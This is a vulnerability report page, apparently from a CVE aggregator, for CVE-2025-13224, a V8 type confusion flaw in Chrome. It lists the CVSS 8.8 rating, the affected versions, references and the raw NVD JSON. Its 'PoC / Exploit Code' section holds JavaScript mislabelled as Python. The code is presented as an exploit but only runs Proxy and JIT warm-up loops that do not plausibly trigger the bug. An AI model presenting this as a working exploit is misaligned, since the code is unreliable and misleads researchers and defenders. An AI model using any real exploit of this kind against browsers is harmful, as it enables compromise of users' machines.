Security Vulnerability Report
中文
CVE-2025-13224 CVSS 8.8 HIGH

CVE-2025-13224

Published: 2025-11-17 23:15:48
Last Modified: 2025-11-19 13:04:59

Description

Type Confusion in V8 in Google Chrome prior to 142.0.7444.175 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 142.0.7444.175
Chromium-based browsers using V8 engine < 142.0.7444.175

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13224 PoC - Type Confusion in V8 // This PoC demonstrates type confusion vulnerability in V8 engine // Target: Google Chrome < 142.0.7444.175 function triggerTypeConfusion() { // Create objects with different hidden classes const obj1 = { value: 0x41414141 }; const obj2 = { data: new ArrayBuffer(1024) }; // Use Proxy to manipulate type information const handler = { get(target, prop) { if (prop === 'typeMarker') { return 0x1337; } return target[prop]; } }; // Force deoptimization and reoptimization function triggerDeopt() { return obj1.value; } // Create type confusion scenario const proxy = new Proxy(obj1, handler); // Trigger JIT compilation for (let i = 0; i < 10000; i++) { triggerDeopt(); } // Attempt to access through confused type // This may cause type confusion in TurboFan const confused = proxy; // Trigger optimization with type mismatch function useConfused(obj) { return obj.value + 1; } for (let i = 0; i < 10000; i++) { useConfused(confused); } return confused; } // HTML trigger // <html><body><script>triggerTypeConfusion();</script></body></html> console.log('PoC for CVE-2025-13224 - V8 Type Confusion'); console.log('Target: Google Chrome < 142.0.7444.175');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13224", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:47.920", "lastModified": "2025-11-19T13:04:59.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Type Confusion in V8 in Google Chrome prior to 142.0.7444.175 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)"}, {"lang": "es", "value": "Confusión de tipos en V8 en Google Chrome versiones anteriores a 142.0.7444.175 permitió a un atacante remoto potencialmente explotar corrupción de pila mediante una página HTML manipulada. (Gravedad de seguridad de Chromium: Alta)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "142.0.7444.175", "matchCriteriaId": "A3F3CAD1-884B-471E-8FDF-F42DA3DC356E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/11/stable-channel-update-for-desktop_17.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/450328966", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}